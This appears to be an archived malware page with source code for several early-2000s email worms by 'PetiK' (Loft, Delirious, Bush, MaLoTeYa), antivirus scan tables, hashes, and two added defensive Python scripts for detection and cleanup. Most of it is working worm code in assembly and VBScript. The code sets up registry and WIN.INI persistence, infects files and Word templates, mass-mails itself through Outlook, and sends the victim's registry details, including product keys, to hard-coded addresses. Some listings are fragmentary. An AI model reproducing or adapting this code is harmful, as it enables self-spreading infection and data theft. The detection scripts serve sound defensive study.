je s_char
cmp al,'"'
je e_char
cmp al,''''
je e_char
cmp al,'@'
jne o_a
inc edx
o_a: stosb
jmp n_char
s_char: inc esi
jmp n_char
e_char: xor al,al
stosb
pop edi
test edx,edx ;if EDX=0, mail is not
je ls_scan_mail ;valid (no '@')
call mapi_init
test eax,eax
jne ls_scan_mail
call send
call close
jmp ls_scan_mail
mapi_init:
xor eax,eax
push offset MAPIHandle
push eax
push eax
push eax
push eax
push eax
callx MAPILogon
ret
.data
htmd: db '<html><head><title>Loft Story WEB Page</title></head>',0dh,0ah
db '<font face=''verdana'' color=green size=''2''>Please accept ActiveX '
db 'to see this page<br><br> Internet Explorer<br><br> </font>',0dh,0ah
db '<SCRIPT Language=VBScript>',0dh,0ah
db 'On Error Resume Next',0dh,0ah
db 'Set w=CreateObject("WScript.Shell")',0dh,0ah
db 'w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ActiveX 1.0",'
db '"C:\ActiveX.vbs"',0dh,0ah
db 'w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Download Directory",'
db '"C:\"',0dh,0ah
db 'document.write "Please download the file ""ActiveX.vbs"" to correct a bug '
db 'in Internet Explorer"',0dh,0ah
db 'document.write "<br>Connect you to internet to download the file<br>"',0dh,0ah
db 'document.write "<br><h2>If you don''t accept ActiveX the syntax failed<h2>"',0dh,0ah
db 'w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",'
db '"http://www.ctw.net/euphoria/ActiveX.vbs"',0dh,0ah
db '</SCRIPT></body></html>',0dh,0ah
HTMTAILLE equ $-htmd
sMessage dd ?
dd offset subject
dd offset body
dd ?
dd offset date
dd ?
dd 2
dd offset mFrom
dd 1
dd offset mTo
dd 1
dd offset attach
mFrom dd ?
dd ?
dd offset mFrom
dd offset sender
dd ?
dd ?
mTo dd ?
dd 1
dd offset mTo
dd offset mail_address
dd ?
dd ?
attach dd ?
dd ?
dd ?
dd offset szCopieb
dd ?
dd ?
filetime struct
LowDateTime dd ?
HighDateTime dd ?
filetime ends
win32 struct
Fileattributes dd ?
CreationTime filetime ?
LastAccessTime filetime ?
LastWriteTime filetime ?
FileSizeHigh dd ?
FileSizeHow dd ?
Reserved0 dd ?
Reserved1 dd ?
FileName dd 260 (?)
AlternativeName db 13 dup (?)
db 3 dup (?)
win32 ends
HTM win32 <>
end DEBUT
end
ACTIVEX.VBS
CN=CreateObject("WScript.NetWork").ComputerName
UN=CreateObject("WScript.NetWork").UserName
UD=CreateObject("WScript.NetWork").UserDomain
NOM=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ENT=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
PI=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
PK=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
V=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
VN=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
P=w.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage")
Set O=CreateObject("Outlook.Application")
Set m=O.CreateItem(0)
m.To = "loftptk@multimania.com"
m.BCC = "petik@multimania.com; euphoria@ctw.net"
m.Subject="Loft Info arrivant de " & P
n = "Date : " & date
n = n & VbCrLf & "Heure : " & time
n = n & VbCrLf & "Nom d'enregistrement : " & NOM
n = n & VbCrLf & "Nom de l'organization : " & ENT
n = n & VbCrLf & "Numéro d'identification : " & PI
n = n & VbCrLf & "Numéro d'enregistrement : " & PK
n = n & VbCrLf & "Version de Windows : " & V & " " & VN
n = n & VbCrLf & "Nom de l'ordinateur : " & CN
n = n & VbCrLf & "Nom de domaine : " & UD
n = n & VbCrLf & "Nom d'utilisateur : " & UN
m.Body = n
m.DeleteAfterSubmit=True
m.Send
w.RegWrite "HKCU\Software\Microsoft\PetiK\LoftInfo","OK"
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.yahoo.fr"
File Loft.exe received on 05.16.2009 17:51:42 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.8704.B
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.14
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!cec4
Avast 4.8.1335.0 2009.05.15 Win32:Petik-LoftStory
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.F
BitDefender 7.2 2009.05.16 Win32.Ltof.A@mm
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.K
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.K
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8704
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.8704.B
F-Prot 4.4.4.56 2009.05.16 W32/Malware!cec4
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.E
GData 19 2009.05.16 Win32.Ltof.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.14
Microsoft 1.4602 2009.05.16 Worm:Win32/PetTick@mm
NOD32 4080 2009.05.15 Win32/Petik.K
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8704.B
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.8704
Panda 10.0.0.14 2009.05.16 W32/Petik.K
PCTools 4.4.2.0 2009.05.16 HTML.Loft.A
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.i
Sophos 4.41.0 2009.05.16 W32/Petik-K
Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.8704.B
VirusBuster 4.6.5.0 2009.05.16 HTML.Loft.A
Additional information
File size: 8704 bytes
MD5...: ee8e03e0a5251a340fe2c08fd7f9c2e4
SHA1..: 4144791ec8571744fe9905309bb6bf7199485a37
' Name : VBS.Delirious
' Author : PetiK
' Language : VBS
' Date : 28/06/2001
Set cpy=sf.GetFile(WScript.ScriptFullName)
cpy.Copy(win&"\Delirious.vbs")
r=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Delire")
ws.RegWrite r,(win&"\Delirious.vbs")
Disque()
Word()
Spread()
If Day(Now)=1 Then
MsgBox "Look at my new virus !"+VbCrLf+"Delirious, isn't it ??",vbinformation,"VBS.Delirious coded by PetiK (c)2001"
End If
bureau=ws.SpecialFolders("Desktop")
Set link=ws.CreateShortCut(bureau&"\Site_Web.url")
link.TargetPath="http://www.jememarre.com"
link.Save
End If
Sub Disque
If not sf.FileExists (sys&"\DeliriousFile.txt") Then
Set DF=sf.CreateTextFile(sys&"\DeliriousFile.txt")
DF.WriteLine "Infected file by VBS.Delirious"
DF.WriteLine "Fichiers infectés par VBS.Delirious :"
DF.WriteBlankLines(1)
DF.Close
End If
Set dr=sf.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub
Sub infection(dossier)
Set f=sf.GetFolder(dossier)
Set fc=f.Files
For Each F in fc
ext=sf.GetExtensionName(F.path)
ext=lcase(ext)
If (ext="vbs") Then
Set verif=sf.OpenTextFile(F.path, 1, False)
If verif.ReadLine <> "'VBS.Delirious" Then
tout=verif.ReadAll()
verif.Close
Set inf=sf.OpenTextFile(F.path, 2, True)
inf.Write(virus)
inf.Write(tout)
inf.Close
Set DF=sf.OpenTextFile(sys&"\DeliriousFile.txt", 8, True)
DF.WriteLine F.path
DF.Close
End If
End If
Next
End Sub
Sub liste(dossier)
Set f=sf.GetFolder(dossier)
Set sd=f.SubFolders
For Each F in sd
infection(F.path)
liste(F.path)
Next
End Sub
Sub Word()
On Error Resume Next
Set CODE=sf.CreateTextFile(sys&"\DeliriousCode.txt")
CODE.Write(virus)
CODE.Close
If ws.RegRead("HKLM\Software\Microsoft\Delirious\InfectNormal") <> "OK" Then
Set wrd=WScript.CreateObject("Word.Application")
wrd.Visible=False
Set NorT=wrd.NormalTemplate.VBProject.VBComponents
NorT.Import sys&"\DeliriousCode.txt"
wrd.Run "Normal.ThisDocument.AutoExec"
wrd.Quit
ws.RegWrite "HKLM\Software\Microsoft\Delirious\InfectNormal","OK"
End If
End Sub
Sub Spread()
WHO=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
Set OA=CreateObject("Outlook.Application")
Set MA=OA.GetNameSpace("MAPI")
For Each C In MA.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set AD=C.AddressEntries(D)
Set EM=OA.CreateItem(0)
EM.To=AD.Address
EM.Subject="Delirious EMail from " & WHO
body="Hi " & AD.Name & ","
body = body & VbCrLf & "Look at this funny attached."
body = body & VbCrLf & ""
body = body & VbCrLf & " Best Regards " & WHO
EM.Body=body
EM.Attachments.Add(win&"\Delirious.vbs")
EM.DeleteAfterSubmit=True
If EM.To <> "" Then
EM.Send
End If
Next
End If
Next
End Sub
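Both VBS.Seven.A (earlier on this page) and VBS.Delirious mark the .vbs files they infect with a fixed first line ('VBS.Seven.A, 'VBS.Delirious), which is the check each worm makes before touching a file again; Seven.A additionally appends a three-line loader stub that starts \WINDOWS\Seven.vbs. The following Python script is an added example, not part of the archive or of the author's code: it scans a directory tree for .vbs files carrying either marker and, for Seven.A, reconstructs the original script from the layout the worm writes (marker line, original text verbatim, one blank line, stub). The sample files it creates are constructed for the demonstration.

```python
import os
import tempfile

# Infection markers taken from the two worms' own checks (cot.ReadLine / verif.ReadLine).
MARKERS = {
    "'VBS.Seven.A": "VBS.Seven.A",
    "'VBS.Delirious": "VBS.Delirious",
}

# Loader stub that VBS.Seven.A appends after the original content (Sub infect).
SEVEN_A_STUB = [
    'Set w=CreateObject("WScript.Shell")',
    'Set f=CreateObject("Scripting.FileSystemObject")',
    'w.run f.GetSpecialFolder(0)&"\\Seven.vbs"',
]


def classify_vbs(text):
    """Return the worm name if the first line is a known infection marker, else None."""
    first = text.split("\n", 1)[0].rstrip("\r")
    return MARKERS.get(first)


def strip_seven_a(text):
    """Recover the original script from a VBS.Seven.A-infected file.

    The worm writes: marker line, original text verbatim, one empty line
    (WriteLine ""), then the three stub lines. Raise ValueError if the file
    does not have exactly that shape, so a damaged file is never "repaired".
    """
    lines = text.splitlines(keepends=True)
    if len(lines) < 5 or lines[0].rstrip("\r\n") != "'VBS.Seven.A":
        raise ValueError("not a VBS.Seven.A-infected file")
    tail = [line.rstrip("\r\n") for line in lines[-3:]]
    if tail != SEVEN_A_STUB:
        raise ValueError("loader stub not found at end of file")
    original = "".join(lines[1:-3])
    # Drop the single line break the worm added after the original content.
    if original.endswith("\r\n"):
        original = original[:-2]
    elif original.endswith("\n"):
        original = original[:-1]
    return original


def scan_tree(root):
    """Walk `root` and return sorted [(path, worm_name)] for every marked .vbs file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".vbs"):
                continue
            path = os.path.join(dirpath, name)
            # newline="" keeps the CRLF line ends the FileSystemObject wrote.
            with open(path, "r", encoding="latin-1", newline="") as fh:
                worm = classify_vbs(fh.read())
            if worm:
                hits.append((path, worm))
    return sorted(hits)


def demo():
    """Build a constructed sample tree and return (relative hits, recovered text)."""
    original = 'MsgBox "hello"\r\n'
    infected = "'VBS.Seven.A\r\n" + original + "\r\n" + "\r\n".join(SEVEN_A_STUB) + "\r\n"
    samples = {
        "clean.vbs": original,
        "seven.vbs": infected,
        os.path.join("sub", "delir.vbs"): "'VBS.Delirious\r\n" + original,
        "notes.txt": "'VBS.Seven.A\r\n",  # wrong extension, must be ignored
    }
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "sub"))
        for rel, text in samples.items():
            with open(os.path.join(root, rel), "w", encoding="latin-1", newline="") as fh:
                fh.write(text)
        hits = [(os.path.relpath(p, root), w) for p, w in scan_tree(root)]
    return hits, strip_seven_a(infected)


if __name__ == "__main__":
    found, recovered = demo()
    for path, worm in found:
        print(f"{worm}: {path}")
    print("recovered:", repr(recovered))
```

Delirious prepends its whole body (the `virus` variable, not shown above) rather than a short stub, so for that marker the script only reports the file; restoring it would need the exact body length, which the page does not give.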
File Delirious.vbs received on 05.16.2009 11:30:16 (CET)
Additional information
File size: 3112 bytes
MD5...: 6e8ba64159c0520ecd7781951dd11fca
SHA1..: 3a176e6646fd14f44074dd9d59122278bafe608c
SHA256: bd2901cb43b873fb0ba5573641a56d24c066069302c7e275555665b12c86a2d8
comment #
Name : I-Worm.Bush
Author : PetiK
Date : July 1st
Size : 8192 byte
Action : If the file is not \WINDOWS\SYSTEM\BIOS.EXE, it copies itself to this file and alters
the run= line in the WIN.INI file to run at each start. It copies itself to \WINDOWS\Bush.exe too.
Otherwise, it creates \WINDOWS\Carnet.vbs and executes it. It adds a value in the Run key to
run this file at each start. If the file already exists, it does nothing.
Afterwards, it checks whether the user is connected. If it finds a connection, it displays a
message and sends a copy of itself to the addresses found with the VBS file.
At the end, it attacks the site of G.W.Bush on Wednesdays.
To compile :
tasm32 /M /ML Bush
tlink32 -Tpe -aa -x Bush,,,import32
C:\TASM32\BIN\brc32 bush.rc
#
.586p
.model flat
.code
callx macro a
extrn a:proc
call a
endm
include useful.inc
push 50h
push offset szCopie
callx GetSystemDirectoryA
@pushsz "\BIOS.EXE"
push offset szCopie
callx lstrcat
push 50h
push offset szCopieb
callx GetWindowsDirectoryA
@pushsz "\Bush.exe"
push offset szCopieb
callx lstrcat
WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA
MESSAGE:push 30h
@pushsz "Error Load Library"
@pushsz "Cannot run the Dynamic Link Library GWBios.dll"
push 00h
callx MessageBoxA
jmp FIN
CAR_A: push 50
push offset szCarnet
callx GetWindowsDirectoryA
@pushsz "\Carnet.vbs"
push offset szCarnet
callx lstrcat
push 00h
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset szCarnet
callx CreateFileA
cmp eax,-1
je DLL
mov [FH],eax
push 00h
push offset octets
push VBSTAILLE
push offset vbsd
push [FH]
callx WriteFile
push [FH]
callx CloseHandle
TXT: pushad
push 50
push offset szCarnet2
callx GetWindowsDirectoryA
@pushsz "\Carnet.txt"
push offset szCarnet2
callx lstrcat
push 00h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 00h
push FILE_SHARE_READ
push GENERIC_READ
push offset szCarnet2
callx CreateFileA
cmp eax,-1
je RETOUR
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je CL1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
callx MapViewOfFile
test eax,eax
je CL2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
xchg eax,ecx
jecxz CL3
d_scan_mail:
call @mlt
db 'mailto:'
@mlt: pop edi
scn_mail:
pushad
push 07h
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop scn_mail
scan_mail:
xor edx,edx
add esi,7 ;size of the string MAILTO:
mov edi,offset m_addr
push edi
p_car: lodsb
cmp al,' '
je car_s
cmp al,'"'
je car_f
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_car
car_s: inc esi
jmp p_car
car_f: xor al,al
stosb
pop edi
test edx,edx ;if edx=0 no @
je d_scan_mail
call send
jmp d_scan_mail
.data
szCarnet db 50 dup (0)
szCarnet2 db 50 dup (0)
szCopie db 50 dup (0)
szCopieb db 50 dup (0)
szOrig db 50 dup (0)
szWinini db 50 dup (0)
FH dd ?
octets dd ?
hdll dd ?
netcheck dd ?
setvalue dd ?
shfolder dd ?
m_addr db 128 dup (?)
Temp dd 0
MAPIh dd 0
sMessage dd ?
dd offset subject
dd offset body
dd ?
dd offset date
dd ?
dd 2
dd offset mFrom
dd 1
dd offset mTo
dd 1
dd offset attach
mFrom dd ?
dd ?
dd offset mFrom
dd offset sender
dd ?
dd ?
mTo dd ?
dd 1
dd offset mTo
dd offset m_addr
dd ?
dd ?
attach dd ?
dd ?
dd ?
dd offset szCopieb
dd ?
dd ?
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set w=CreateObject("WScript.Shell")',0dh,0ah
db 'If not f.FileExists (f.GetSpecialFolder(0)&"\Carnet.txt") Then',0dh,0ah
db 'Set cr=f.CreateTextFile(f.GetSpecialFolder(0)&"\Carnet.txt")',0dh,0ah
db 'cr.Close',0dh,0ah
db 'End If',0dh,0ah
db 'Set OA=CreateObject("Outlook.Application")',0dh,0ah
db 'Set MA=OA.GetNameSpace("MAPI")',0dh,0ah
db 'For each A In MA.AddressLists',0dh,0ah
db 'If A.Addressentries.Count <> 0 Then',0dh,0ah
db 'For B=1 To A.AddressEntries.Count',0dh,0ah
db 'Set C=A.AddressEntries(B)',0dh,0ah
db 'If w.RegRead ("HKCU\Software\Bush\" & C.Address) <> "OK" Then',0dh,0ah
db 'Set car=f.OpenTextFile(f.GetSpecialFolder(0)&"\Carnet.txt", 8, True)',0dh,0ah
db 'car.WriteLine """mailto:" & C.Address & """"',0dh,0ah
db 'car.Close',0dh,0ah
db 'w.RegWrite "HKCU\Software\Bush\" & C.Address,"OK"',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
VBSTAILLE equ $-vbsd
end DEBUT
end
File Bush.exe received on 05.16.2009 11:20:57 (CET)
Additional information
File size: 9216 bytes
MD5...: 1defedea5174374180d660693622fb90
SHA1..: f8047ed4d150dfd6ae9e8fd5cd6146c960570f1b
comment #
Name : I-Worm.MaLoTeYa
Author : PetiK
Date : July 2nd - July 6th
Size : 12288 byte
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
;----------------------------------------
;Installation of the worm in the computer
;----------------------------------------
DEBUT:
VERIF: push 00h
callx GetModuleFileNameA
push 50h
push offset szOrig
push eax
callx GetModuleFileNameA
push 50h
push offset szCopie
callx GetWindowsDirectoryA
@pushsz "\RUNW32.EXE"
push offset szCopie
callx lstrcat
push 50h
push offset szCopb
callx GetSystemDirectoryA
@pushsz "\MSVA.EXE"
push offset szCopb
callx lstrcat
WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA
;--------------------------------------------------
;Create VARegistered.htm file in the StartUp folder
;--------------------------------------------------
C_GET: @pushsz "SHELL32.dll"
callx LoadLibraryA
mov SHELLhdl,eax
@pushsz "SHGetSpecialFolderPathA"
push SHELLhdl
callx GetProcAddress
mov getfolder,eax
push 00h
push 07h ; STARTUP Folder
push offset StartUp
push 00h
call [getfolder]
test eax,eax
je F_HTM
@pushsz "\VARegistered.htm"
push offset StartUp
callx lstrcat
D_INF: push 50
push offset szCurrent
callx GetCurrentDirectoryA
push offset szCurrent
callx SetCurrentDirectoryA
;---------------------------------------------
;Infect all *.htm* files of the Windows folder
;---------------------------------------------
FFF: push offset Search
@pushsz "*.htm*" ; Search some *.htm* files...
callx FindFirstFileA
inc eax
je F_INF
dec eax
mov [htmlHdl],eax
PAYS: push 50
push offset szSystemini
callx GetWindowsDirectoryA
@pushsz "\Win.ini"
push offset szSystemini
callx lstrcat
push offset szSystemini
push 20
push offset org_pays
push offset Default
@pushsz "sCountry"
@pushsz "intl"
callx GetPrivateProfileStringA
;------------------------------------------------------------------
; Send the name of country to "petik@multomania.com" (perhaps bugs)
;------------------------------------------------------------------
SMTP: push offset WSA_Data ; Winsock
push 0101h ; ver 1.1 (W95+)
callx WSAStartup
or eax,eax
jnz INIT
@pushsz "obelisk.mpt.com.uk"
callx gethostbyname ; convert SMTP Name to an IP address
xchg ecx,eax
jecxz FREE_WIN ; Error ?
mov esi,[ecx+12] ; Fetch IP address
lodsd
push eax
pop [ServIP]
call @2 ; Time-out:
Time_Out: dd 5 ; Seconds
dd 0 ; Milliseconds
@2:
push eax ; Not used (Error)
push eax ; Not used (Writeability)
call @3
Socket_Set: dd 1 ; Socket count
work_socket dd 0 ; Socket
@3:
push eax ; Unused
callx select
dec eax
jnz CLOSE_SOC
push 00h
push 512 ; Received data from socket
push offset buf_recv
push [work_socket]
callx recv
xchg ecx,eax ; Connection closed ?
jecxz CLOSE_SOC
inc ecx ; Error ?
jz CLOSE_SOC
or ebx,ebx ; Received stuff was QUIT
jz CLOSE_SOC ; reply ? then close up.
mov al,'2' ; "OK" reply
cmp bl,2 ; Received stuff was the DATA
jne Check_Reply ; reply ?
inc eax
Check_Reply: scasb
je Wait_Ready
lea esi,Send_M + (5*4)
mov bl,1
Wait_Ready:
xor ecx,ecx
lea eax,Time_Out
push eax
push ecx ; not used (Error)
lea eax,Socket_Set
push eax ; Writeability
push ecx ; Not used (Readability)
push ecx ; Unused
callx select
dec eax ; Time-ouit ??
jnz CLOSE_SOC
cld
lodsd
movzx ecx,ax
shr eax,16
add eax,ebp
CLOSE_SOC:
push [work_socket]
callx closesocket
FREE_WIN:
callx WSACleanup
;-----------------------------------------------------------
; Search email addresses into the "Temporary Internet Files"
;-----------------------------------------------------------
FFF2: push offset Search
@pushsz "*.htm*"
callx FindFirstFileA
inc eax
je END_SPREAD
dec eax
mov [htmlHdl],eax
END_SPREAD:
push [MAPIhdl]
callx FreeLibrary
;---------------------------------------------------------------
; Changes the title of the System Properties window on Wednesday
;---------------------------------------------------------------
DATE: push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],3
jne FIN
WIN1: @pushsz "Propriétés Systême"
push 00h
callx FindWindowA
test eax,eax
jz WIN2
jmp WIN3
WIN2: @pushsz "System Properties" ; Change title some windows
push 00h
callx FindWindowA
test eax,eax
jz WIN1
WIN3: mov edi,eax
@pushsz "PetiK always is with you :-)"
push edi
callx SetWindowTextA
jmp WIN1
FIN: push 00h
callx ExitProcess
infect: pushad
mov esi,offset Search.cFileName
push esi
callx GetFileAttributesA
cmp eax,1
je end_infect
push 00h
push 80h
push 03h
push 00h
push 01h
push 40000000h
push esi
callx CreateFileA
xchg eax,edi
inc edi
je end_infect
dec edi
push 02h ; FILE_END
push 00h
push [Dist]
push edi
callx SetFilePointer
push 00h
push offset octets
push HTMSIZE
push offset d_htm
push edi
callx WriteFile
push edi
callx CloseHandle
push 01h ; READONLY
push esi
callx SetFileAttributesA
end_infect: popad
ret
infect2:pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset Search.cFileName
inc eax
je END_SPREAD
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h ; PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h ; FILE_MAP_READ
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
xchg eax,ecx
jecxz F3
d_scan_mail:
call @melto
db 'mailto:'
@melto: pop edi
scn_mail:
pushad
push 07h
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop scn_mail
.data
namer db 50 dup (0)
szCopb db 50 dup (0)
szCopie db 50 dup (0)
szCurrent db 50 dup (0)
szOrig db 50 dup (0)
szSystemini db 50 dup (0)
szWinini db 50 dup (0)
Cache db 70 dup (0)
StartUp db 70 dup (0)
m_addr db 128 dup (?)
WSA_Data db 400 dup (0)
buf_recv db 512 dup (0)
Default db 0
FileHdl dd ?
octets dd ?
netcheck dd ?
sendmail dd ?
getfolder dd ?
htmlHdl dd ?
MAPIhdl dd ?
SHELLhdl dd ?
WNEThdl dd ?
RegHdl dd ?
Dist dd 0
Temp dd 0
MAPIh dd 0
WormName db "I-Worm.MaLoTeYa coded by PetiK (c)2001 (05/07)",00h
Origine db "Made In France",00h
Message dd ?
dd offset sujet
dd offset corps
dd ?
dd offset date
dd ?
dd 2 ; MAPI_RECEIPT_REQUESTED ??
dd offset MsgFrom
dd 1 ; MAPI_UNREAD ??
dd offset MsgTo
dd 1
dd offset AttachDesc
MsgFrom dd ?
dd ?
dd offset NameFrom
dd offset MailFrom
dd ?
dd ?
MsgTo dd ?
dd 1 ; MAIL_TO
dd offset NameTo
dd offset m_addr
dd ?
dd ?
AttachDesc dd ?
dd ?
dd ? ; character in text to be replaced by attachment
dd offset szCopb ; Full path name of attachment file
dd ?
dd ?
Send_M: dw fHELO-dHELO
dw fFROM-dFROM
dw fRCPT-dRCPT
dw fDATA-dDATA
dw fMAIL-dMAIL
dw fQUIT-dQUIT
OSVERSIONINFO struct
dwOSVersionInfoSize dd ?
dwMajorVersion dd ?
dwMinorVersion dd ?
dwBuildNumber dd ?
dwPlatformId dd ?
szCSDVersion db 128 dup (?)
OSVERSIONINFO ends
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
end DEBUT
end
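I-Worm.Loft, I-Worm.Bush and I-Worm.MaLoTeYa above all persist the same way: WritePrivateProfileStringA("windows", "run", <path of the copy>, WIN.INI) rewrites the run= line of the [windows] section so the copy is started with every session (MaLoTeYa also reads sCountry from the [intl] section of the same file). The following Python script is an added example, not part of the archive or of the author's code: it parses WIN.INI text, lists the run= and load= autostart entries, and flags any whose file name matches the copies named in these three sources (LOFT.EXE, LOFT_STORY.EXE, BIOS.EXE, Bush.exe, RUNW32.EXE, MSVA.EXE). The sample INI text is constructed.

```python
# File names of the copies taken from the Loft, Bush and MaLoTeYa sources above
# (compared case-insensitively, as the FAT file system does).
KNOWN_COPIES = {"loft.exe", "loft_story.exe", "bios.exe", "bush.exe", "runw32.exe", "msva.exe"}


def parse_ini(text):
    """Minimal WIN.INI parser: {section_lower: {key_lower: value}}.

    Keeps the last value for a repeated key, ignores ';' comment lines and
    blank lines, and tolerates whitespace around '='.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current][key.strip().lower()] = value.strip()
    return sections


def autostart_entries(text):
    """Return [(key, program)] for every program on the [windows] load= / run= lines.

    Windows accepts several programs on one line separated by spaces or commas;
    with 8.3 names, unquoted paths containing spaces are unlikely, so splitting
    on both separators is assumed here.
    """
    windows = parse_ini(text).get("windows", {})
    entries = []
    for key in ("load", "run"):
        for program in windows.get(key, "").replace(",", " ").split():
            entries.append((key, program))
    return entries


def flag_known_copies(text):
    """Return the autostart entries whose file name is one of the worms' copies."""
    flagged = []
    for key, program in autostart_entries(text):
        name = program.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if name in KNOWN_COPIES:
            flagged.append((key, program))
    return flagged


# Constructed sample resembling a Windows 9x WIN.INI after I-Worm.Loft has run.
SAMPLE_WIN_INI = """; for 16-bit app support
[windows]
load=
run=C:\\WINDOWS\\SYSTEM\\LOFT.EXE
NullPort=None

[Desktop]
Wallpaper=(None)

[intl]
sCountry=France
"""

if __name__ == "__main__":
    for key, program in autostart_entries(SAMPLE_WIN_INI):
        print(f"{key}= {program}")
    print("flagged:", flag_known_copies(SAMPLE_WIN_INI))
```

Any non-empty run= or load= value deserves a look on a system of that era, whether or not the name is in the list; the list only turns a generic autostart finding into an attribution to one of these three worms.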
File Maloteya.exe received on 05.16.2009 17:52:03 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.12288
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.4
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!8c02
Avast 4.8.1335.0 2009.05.15 Win32:Petik-Maloteya
